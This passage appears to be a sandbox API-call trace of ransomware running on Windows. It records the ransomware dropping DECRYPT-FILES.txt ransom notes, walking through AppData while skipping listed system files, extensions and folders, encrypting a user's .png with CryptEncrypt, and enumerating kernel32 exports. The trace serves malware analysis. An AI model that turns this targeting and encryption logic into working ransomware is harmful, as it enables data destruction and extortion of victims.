(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0076.553] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0076.554] CloseHandle (hObject=0x434) returned 1 [0076.554] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0076.554] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*" [0076.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0076.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.554] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.555] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.555] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.555] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.555] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.555] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.555] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.555] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.555] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.555] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.555] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned 38 [0076.555] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.555] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\" [0076.555] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\jkbimi8.tmp" [0076.555] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.555] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.556] CloseHandle (hObject=0x0) returned 0 [0076.556] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.556] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0076.556] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0076.556] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0076.556] lstrcatW (in: lpString1="Local", lpString2="\\" | out: lpString1="Local\\") returned="Local\\" [0076.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Local\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\" [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Program Files") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch=":\\Windows") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Games\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\All Users") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.556] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\", lpSrch="\\AppData\\Local") returned="\\AppData\\Local\\" [0076.556] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0076.556] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0076.556] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0076.556] lstrcatW (in: lpString1="LocalLow", lpString2="\\" | out: lpString1="LocalLow\\") returned="LocalLow\\" [0076.556] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="LocalLow\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\" [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Program Files") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch=":\\Windows") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Games\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\All Users") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\", lpSrch="\\AppData\\Local") returned="\\AppData\\LocalLow\\" [0076.557] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88019650, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x88019650, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0076.557] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0076.557] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0076.557] lstrcatW (in: lpString1="Roaming", lpString2="\\" | out: lpString1="Roaming\\") returned="Roaming\\" [0076.557] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Program Files") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch=":\\Windows") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Games\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\All Users") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="AhnLab") returned 0x0 [0076.557] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.557] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.557] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.558] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\jkbimi8.tmp") returned 58 [0076.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x438 [0076.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.558] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.558] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\DECRYPT-FILES.txt") returned 64 [0076.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0076.559] WriteFile (in: hFile=0x43c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.560] CloseHandle (hObject=0x43c) returned 1 [0076.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*" [0076.563] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*", lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c58 [0076.563] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.563] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.563] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.563] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.563] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1ea0430, ftCreationTime.dwHighDateTime=0x1d4c79d, ftLastAccessTime.dwLowDateTime=0xb9df9be0, ftLastAccessTime.dwHighDateTime=0x1d4d354, ftLastWriteTime.dwLowDateTime=0xb9df9be0, ftLastWriteTime.dwHighDateTime=0x1d4d354, nFileSizeHigh=0x0, nFileSizeLow=0x578e, dwReserved0=0x0, dwReserved1=0x0, cFileName="1ek gB-.png", cAlternateFileName="1EKGB-~1.PNG")) returned 1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="DECRYPT-FILES.txt") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="autorun.inf") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="boot.ini") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="desktop.ini") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="ntuser.dat") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="iconcache.db") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="bootsect.bak") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="ntuser.dat.log") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="thumbs.db") returned -1 [0076.563] lstrcmpiW (lpString1="1ek gB-.png", lpString2="Bootfont.bin") returned -1 [0076.563] lstrlenW (lpString="1ek gB-.png") returned 11 [0076.563] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0076.563] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0076.563] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0076.563] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0076.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.563] lstrlenW (lpString="1ek gB-.png") returned 11 [0076.564] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="1ek gB-.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png" [0076.564] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1ek gB-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1ek gb-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.564] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=22414) returned 1 [0076.564] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.564] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0076.564] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.565] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.565] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.565] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.569] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0076.569] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.569] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0076.570] CloseHandle (hObject=0x444) returned 1 [0076.570] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.570] WriteFile (in: hFile=0x440, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.571] CloseHandle (hObject=0x0) returned 0 [0076.571] CloseHandle (hObject=0x440) returned 1 [0076.572] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.572] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.572] GetTickCount () returned 0x114ba7a [0076.572] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.573] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.573] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.573] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.573] lstrlenA (lpString="kernel32.dll") returned 12 [0076.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.573] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.573] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.573] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.574] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.574] lstrlenA (lpString="ADDATOMA") returned 8 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.574] lstrlenA (lpString="ADDATOMW") returned 8 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.574] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.574] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.574] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.574] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.574] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.574] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" 